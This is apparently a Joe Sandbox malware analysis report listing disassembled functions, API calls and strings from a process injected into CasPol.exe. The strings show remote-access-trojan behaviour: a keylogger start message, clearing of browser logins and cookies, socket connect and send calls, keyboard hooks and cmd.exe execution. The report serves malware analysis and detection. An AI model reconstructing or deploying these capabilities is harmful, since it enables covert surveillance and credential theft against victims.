                                                                                            • API String ID: 313313983-0
                                                                                            • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                            • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                            • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                            • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                            • _free.LIBCMT ref: 0044E1A0
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                            • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                            • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                            • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                            • _free.LIBCMT ref: 00446F7D
                                                                                            • _free.LIBCMT ref: 00446FA4
                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                            • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                            • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                            • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                            • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0044F7B5
                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 0044F7C7
                                                                                            • _free.LIBCMT ref: 0044F7D9
                                                                                            • _free.LIBCMT ref: 0044F7EB
                                                                                            • _free.LIBCMT ref: 0044F7FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                            • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                            • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00443305
                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00443317
                                                                                            • _free.LIBCMT ref: 0044332A
                                                                                            • _free.LIBCMT ref: 0044333B
                                                                                            • _free.LIBCMT ref: 0044334C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                            • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                            • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                            • String ID: (FG
                                                                                            • API String ID: 3142014140-2273637114
                                                                                            • Opcode ID: eb2bca1e6d2cb62f49359eca3696a5b788354994f25ad01b61c56b8fabd667be
                                                                                            • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                            • Opcode Fuzzy Hash: eb2bca1e6d2cb62f49359eca3696a5b788354994f25ad01b61c56b8fabd667be
                                                                                            • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                            APIs
                                                                                            • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                            • _free.LIBCMT ref: 0044D5C5
                                                                                              • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                              • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                              • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                            • String ID: *?$.
                                                                                            • API String ID: 2812119850-3972193922
                                                                                            • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                            • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                            • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                            • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                            APIs
                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                              • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                            • String ID: XCG$`AG$>G
                                                                                            • API String ID: 2334542088-2372832151
                                                                                            • Opcode ID: 8ea2362fd4b99c9916fc71bf3fc372679012ea805d421a90e43c80cd1edb4417
                                                                                            • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                            • Opcode Fuzzy Hash: 8ea2362fd4b99c9916fc71bf3fc372679012ea805d421a90e43c80cd1edb4417
                                                                                            • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                            • API String ID: 2506810119-3657627342
                                                                                            • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                            • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                            • API String ID: 368326130-2663660666
                                                                                            • Opcode ID: dfa64f9047554a707b91e77b14ac24b19fa43de0bfeca1bd13ed9ec92fdcbe0b
                                                                                            • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                            • Opcode Fuzzy Hash: dfa64f9047554a707b91e77b14ac24b19fa43de0bfeca1bd13ed9ec92fdcbe0b
                                                                                            • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventLocalTimewsprintf
                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                            • API String ID: 1497725170-1359877963
                                                                                            • Opcode ID: 1d10a37c34326f04bd8ec3fc0ae341709748cacc557a8cfb832170af7926ff1e
                                                                                            • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                            • Opcode Fuzzy Hash: 1d10a37c34326f04bd8ec3fc0ae341709748cacc557a8cfb832170af7926ff1e
                                                                                            • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                            APIs
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                            • String ID: Online Keylogger Started
                                                                                            • API String ID: 112202259-1258561607
                                                                                            • Opcode ID: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                            • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                            • Opcode Fuzzy Hash: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
                                                                                            • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                            • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                            • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                            • String ID: `@
                                                                                            • API String ID: 2583163307-951712118
                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                            • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                            • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                            • String ID: Connection Timeout
                                                                                            • API String ID: 2055531096-499159329
                                                                                            • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                            • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                            • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                            • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                            • String ID: bad locale name
                                                                                            • API String ID: 3628047217-1405518554
                                                                                            • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                            • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                            • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                            • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExecuteShell
                                                                                            • String ID: /C $cmd.exe$open
                                                                                            • API String ID: 587946157-3896048727
                                                                                            • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                            • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                            APIs
                                                                                            • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                            • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                            • String ID: pth_unenc
                                                                                            • API String ID: 3123878439-4028850238
                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                            • API String ID: 2574300362-1519888992
                                                                                            • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                            • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                            • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                            • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __alldvrm$_strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1036877536-0
                                                                                            • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                            • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                            • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                            • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                            • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                            • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                            • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 3360349984-0
                                                                                            • Opcode ID: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                            • Opcode Fuzzy Hash: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                            APIs
                                                                                            Strings
                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                            • API String ID: 3472027048-1236744412
                                                                                            • Opcode ID: 75935dd92c54438d520984c0fbed3049675ace49491bc7afa837b165368f9319
                                                                                            • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                            • Opcode Fuzzy Hash: 75935dd92c54438d520984c0fbed3049675ace49491bc7afa837b165368f9319
                                                                                            • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                            APIs
